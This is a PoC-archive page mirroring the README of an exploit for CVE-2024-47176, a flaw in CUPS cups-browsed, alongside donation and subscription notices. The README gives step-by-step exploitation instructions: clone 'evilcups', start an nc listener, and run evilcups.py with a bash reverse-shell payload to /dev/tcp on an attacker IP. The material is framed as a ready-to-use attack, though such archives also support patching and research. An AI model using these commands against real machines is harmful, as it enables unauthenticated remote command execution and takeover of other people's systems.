Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-47176 PoC — cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source

Source
https://github.com/gumerzzzindo/CVE-2024-47176
Associated Vulnerability
Title:cups-browsed binds to `INADDR_ANY:631`, trusting any packet from any source (CVE-2024-47176)
Description:CUPS is a standards-based, open-source printing system, and `cups-browsed` contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. `cups-browsed` binds to `INADDR_ANY:631`, causing it to trust any packet from any source, and can cause the `Get-Printer-Attributes` IPP request to an attacker controlled URL. When combined with other vulnerabilities, such as CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177, an attacker can execute arbitrary commands remotely on the target machine without authentication when a malicious printer is printed to.
Readme
# CVE-2024-47176: Remote Command Execution in CUPS
## Description
CUPS (Common UNIX Printing System) is an open-source printing system that handles networked printers. CVE-2024-47176 specifically targets the cups-browsed functionality, which binds to INADDR_ANY:631, allowing it to trust any packet from any source. By manipulating the Get-Printer-Attributes IPP request, an attacker can send malicious print jobs from a remote system, leading to arbitrary command execution when combined with other vulnerabilities such as CVE-2024-47076 and CVE-2024-47175.
## Steps to Exploit CVE-2024-47176

### Prerequisites
- Access to the target machine with port 631 (IPP) exposed to the internet.
- Python installed on your local machine (for running the exploit script).
- `nmap` installed for scanning the target.

---

### Setup

1. Clone the repository:

    ```bash
    git clone https://github.com/<your-username>/evilcups.git
    cd evilcups
    ```

2. Install the required Python module:

    ```bash
    pip install ippserver
    ```

3. Ensure you have a listener ready to receive a reverse shell on your local machine. You can use `nc` for this:

    ```bash
    nc -lvnp <port>
    ```

## Usage

Run the exploit script with the following syntax:

```bash
./evilcups.py <attacker_ip> <target_ip> "<command>"
```
### For example
```bash
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
```
File Snapshot

 [4.0K]  /data/pocs/1eaa1f7858f2fc4ecd1466fb495d463b4e13f83e
├── [7.4K]  evilcups.py
└── [1.4K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →